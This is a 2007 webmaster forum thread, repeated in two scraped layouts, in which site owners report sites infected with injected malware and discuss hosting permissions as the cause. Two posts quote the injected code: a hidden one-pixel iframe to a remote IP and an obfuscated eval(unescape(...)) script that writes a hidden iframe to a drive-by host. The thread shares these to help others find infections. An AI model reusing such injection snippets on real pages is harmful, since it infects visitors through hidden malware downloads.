more than 100 of my sites infected with trojans - check yours - GoFuckYourself.com

Antonio · 09-02-2007, 04:38 AM

first of all a big thanks to KimJI to pointing it out to me

the sites are on two hosts, dreamhost and rocktflow, all my other hosts seem ok

anyway, if you have sites on these two hosts, you should ckeck them - one line of iframe code in the index file, no idea what the code does

what a lovely way to spend your Sunday morning

Aussie Rebel · 09-02-2007, 04:54 AM

Can you please post the code so we know what we are looking for? thanks

Matt 26z · 09-02-2007, 05:04 AM

Are you running any scripts that may have a security hole?

BOSS1 · 09-02-2007, 05:29 AM

Damn good that you noticed before you lost all bookmarkers!

Antonio · 09-02-2007, 05:30 AM

Quote:

Originally Posted by Aussie Rebel

Can you please post the code so we know what we are looking for? thanks

Code:

<iframe src='http://81.95.149.74/22/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

as I said no idea what id does and I don't want to know but I know for sure that I didn't put it there

Quote:

Originally Posted by Matt 26z

Are you running any scripts that may have a security hole?

nope, at first I thought it was from the recent linex security hole, but when I started checking my sites - ALL of them were infected (I have linkex on only 15 sites or so), some of them are wordpress blogs, some are single index html file, some are running tgp scripts, basically mixed bag of goodies

gooddomains · 09-02-2007, 05:49 AM

fucking spyware

ladida · 09-02-2007, 05:55 AM

It's a trojan installer. You're in for some mess.

facialfreak · 09-02-2007, 06:00 AM

Seems to be an epidemic with Dreamhost'ed sites ...

And its too bad really ... Dreamhost leaves all files owned by apache by default, so your sites might as well have a flashing neon sign inviting cyber criminals ...

I feel your pain Antonio, but unfortunately it usually takes something of this nature for webmasters to take a crash course in simple website security.

Scootermuze · 09-02-2007, 08:41 AM

I had that happen on a few sites of mine from a diofferent server... I guess the perps just make their rounds from host to host..

I started checking them daily and removing the script as they popped up.. eventually went away...

Quickdraw · 09-02-2007, 08:47 AM

Here is another hack that has hit Dreamhost for sites like dommephonesex.com, thecollegeslut.com, beckybank.com,fortheloveoffeet.com,bbwbecky.com
and haven't been fixed for months..

Code:

>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%73%74%61%74%31%63%6f%75%6e%74%2e%6e%65%74%2f%73%74%72%6f%6e%67%2f%31%36%37%2f%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));
which turns to this
iframe src=http://stat1count.net/strong/167

and they also have iframe as well

 src='hxxp://mediacount.net/adv/013/new.php' width=1 height=1>

ridikuloz · 09-02-2007, 08:52 AM

happened to me before.... fuckin' russians :X

TeenCat · 09-02-2007, 09:39 AM

umm ... i think i am on the internet

thanks for sharing that info!

Mutt · 09-02-2007, 11:39 AM

i had that one months ago - removed it and it never came back. i did have a WordPress installation on the server and that's the only guess I have for how they got in.

GrouchyAdmin · 09-02-2007, 11:48 AM

This is the problem you have when you run a virtualhost without SuExec/SuPHP permissions to set them to the specific user account, and directories are not properly chowned.

There's a performance hit for it, but it's well worth the cost of administration and notifying your clients. One old WP 1.5 install doesn't destroy hundreds of sites.

Pornopat · 09-02-2007, 11:50 AM

Had that one and it gave me a fucking headache for months.It just kept coming back in different forms.

d-null · 10-04-2007, 02:26 AM

bumping this because I just noticed that I have been hit on two different hosts

my own site triggered my norton virus detection and I checked and it is the same code but mine was directing to mediacount.net

bastards

d-null · 10-04-2007, 02:38 AM

I notice that mediacount.net is a russian site as well.

Check your index.html files... they only got into my main domains (not the subdomains)

cess · 10-04-2007, 05:01 AM

Quote:

Originally Posted by facialfreak

Seems to be an epidemic with Dreamhost'ed sites ...

And its too bad really ... Dreamhost leaves all files owned by apache by default, so your sites might as well have a flashing neon sign inviting cyber criminals ...

Eh?? I have two accounts with dreamhost and every domain I've ever added always had extra web security "enabled". Every file on my dreamhost accounts are owned by my user name and not apache.

cess · 10-04-2007, 05:12 AM

Quote:

Originally Posted by GrouchyAdmin

This is the problem you have when you run a virtualhost without SuExec/SuPHP permissions to set them to the specific user account

By default dreamhost does enable that.

d-null · 10-04-2007, 11:18 AM

mine was not dreamhost and I found the problem on two completely separate distinct servers, so it is a good idea to check your files periodically no matter who you are hosting with

Az A Bay Bay · 10-04-2007, 12:52 PM

congrats!

riddler · 10-04-2007, 12:56 PM

rocketflow servers seem to get rooted alot.

alby_persignup · 10-04-2007, 01:26 PM

another trojan attacks!

09-02-2007, 04:38 AM	#1
Antonio Too lazy to set a custom title Join Date: Oct 2001 Location: Spartaaaaaaaaa Posts: 14,136	more than 100 of my sites infected with trojans - check yours first of all a big thanks to KimJI to pointing it out to me the sites are on two hosts, dreamhost and rocktflow, all my other hosts seem ok anyway, if you have sites on these two hosts, you should ckeck them - one line of iframe code in the index file, no idea what the code does what a lovely way to spend your Sunday morning

09-02-2007, 05:29 AM	#4
BOSS1 Confirmed User Join Date: Sep 2005 Location: Montreal / Sparta Posts: 4,331	Damn good that you noticed before you lost all bookmarkers! __________________ NEW SITE: Stockings Kingdom Lesbians in Latex, Lesbians in Stockings, Granny Sex, BDSM Porn, Latex and Sex, Custom Foot Fetish, Femdom Movies and Kinky Porn Pass. 300+ hosted flvs, 500+ hosted galleries, Page Peel ADs.. NATS export and payouts twice a month

09-02-2007, 05:55 AM	#7
ladida Confirmed User Join Date: Nov 2005 Posts: 2,167	It's a trojan installer. You're in for some mess. __________________ agentGFY at gmail.com

09-02-2007, 06:00 AM	#8
facialfreak Confirmed User Join Date: Feb 2005 Location: Montreal Posts: 3,018	Seems to be an epidemic with Dreamhost'ed sites ... And its too bad really ... Dreamhost leaves all files owned by apache by default, so your sites might as well have a flashing neon sign inviting cyber criminals ... I feel your pain Antonio, but unfortunately it usually takes something of this nature for webmasters to take a crash course in simple website security. __________________ Managed Shared Hosting starting at $4.99/mo Managed VPS starting at $29.99/mo

09-02-2007, 08:52 AM	#11
ridikuloz Confirmed User Join Date: Jun 2005 Location: ▓NY▓ Posts: 2,080	happened to me before.... fuckin' russians :X __________________ Each persons' level of stupidity makes us different.

09-02-2007, 04:54 AM	#2
Aussie Rebel Blow Me U Geeks Join Date: Aug 2001 Location: Maximum Security Posts: 5,108	Can you please post the code so we know what we are looking for? thanks

09-02-2007, 05:04 AM	#3
Matt 26z So Fucking Banned Industry Role: Join Date: Apr 2002 Location: ¤ª"˜¨๑۩۞۩๑¨˜"ª¤ Posts: 18,481	Are you running any scripts that may have a security hole?

09-02-2007, 05:49 AM	#6
gooddomains Too lazy to set a custom title Join Date: Jul 2003 Location: Netherlands Posts: 10,127	fucking spyware

09-02-2007, 08:41 AM	#9
Scootermuze Confirmed User Join Date: Dec 2001 Posts: 4,513	I had that happen on a few sites of mine from a diofferent server... I guess the perps just make their rounds from host to host.. I started checking them daily and removing the script as they popped up.. eventually went away...

09-02-2007, 09:39 AM	#12
TeenCat Too lazy to set a koala Industry Role: Join Date: Jan 2007 Location: CZ/EU forever! Posts: 16,139	umm ... i think i am on the internet thanks for sharing that info! __________________ 6bot / Coming again very soon! Svit Zlin Radio 24/7!

09-02-2007, 11:39 AM	#13
Mutt Too lazy to set a custom title Industry Role: Join Date: Sep 2002 Posts: 34,431	i had that one months ago - removed it and it never came back. i did have a WordPress installation on the server and that's the only guess I have for how they got in. __________________ I moved my sites to Vacares Hosting. I've saved money, my hair is thicker, lost some weight too! Thanks Sly!

09-02-2007, 11:48 AM	#14
GrouchyAdmin Now choke yourself! Industry Role: Join Date: Apr 2006 Posts: 12,085	This is the problem you have when you run a virtualhost without SuExec/SuPHP permissions to set them to the specific user account, and directories are not properly chowned. There's a performance hit for it, but it's well worth the cost of administration and notifying your clients. One old WP 1.5 install doesn't destroy hundreds of sites. __________________ AIM: GrouchyGfy

09-02-2007, 11:50 AM	#15
Pornopat AdultTubeSubmits.com Industry Role: Join Date: Dec 2003 Location: The Netherlands Posts: 10,598	Had that one and it gave me a fucking headache for months.It just kept coming back in different forms. __________________ https://stripcash.com/sign-up/?userI...fff832eb95ab6a

10-04-2007, 02:26 AM	#16
d-null . . . Industry Role: Join Date: Apr 2007 Location: NY Posts: 13,724	bumping this because I just noticed that I have been hit on two different hosts my own site triggered my norton virus detection and I checked and it is the same code but mine was directing to mediacount.net bastards __________________ __________________ Looking for a custom TUBE SCRIPT that supports massive traffic, load balancing, billing support, and h264 encoding? Hit up Konrad! Looking for designs for your websites or custom tubesite design? Hit up Zuzana Designs Check out the #1 WordPress SEO Plugin: CyberSEO Suite

10-04-2007, 02:38 AM	#17
d-null . . . Industry Role: Join Date: Apr 2007 Location: NY Posts: 13,724	I notice that mediacount.net is a russian site as well. Check your index.html files... they only got into my main domains (not the subdomains) __________________ __________________ Looking for a custom TUBE SCRIPT that supports massive traffic, load balancing, billing support, and h264 encoding? Hit up Konrad! Looking for designs for your websites or custom tubesite design? Hit up Zuzana Designs Check out the #1 WordPress SEO Plugin: CyberSEO Suite

10-04-2007, 11:18 AM	#20
d-null . . . Industry Role: Join Date: Apr 2007 Location: NY Posts: 13,724	mine was not dreamhost and I found the problem on two completely separate distinct servers, so it is a good idea to check your files periodically no matter who you are hosting with __________________ __________________ Looking for a custom TUBE SCRIPT that supports massive traffic, load balancing, billing support, and h264 encoding? Hit up Konrad! Looking for designs for your websites or custom tubesite design? Hit up Zuzana Designs Check out the #1 WordPress SEO Plugin: CyberSEO Suite

10-04-2007, 12:52 PM	#21
Az A Bay Bay Confirmed User Join Date: Sep 2007 Posts: 1,129	congrats! __________________ Home of Ed Powers and america's next hot pornstar

10-04-2007, 12:56 PM	#22
riddler Confirmed User Join Date: Oct 2004 Location: up in gang bang heaven Posts: 3,726	rocketflow servers seem to get rooted alot.

10-04-2007, 01:26 PM	#23
alby_persignup Confirmed User Join Date: May 2007 Posts: 3,119	another trojan attacks! __________________ OnProbation Links Directory \| OnProbation Design Services \| OnProbation Cash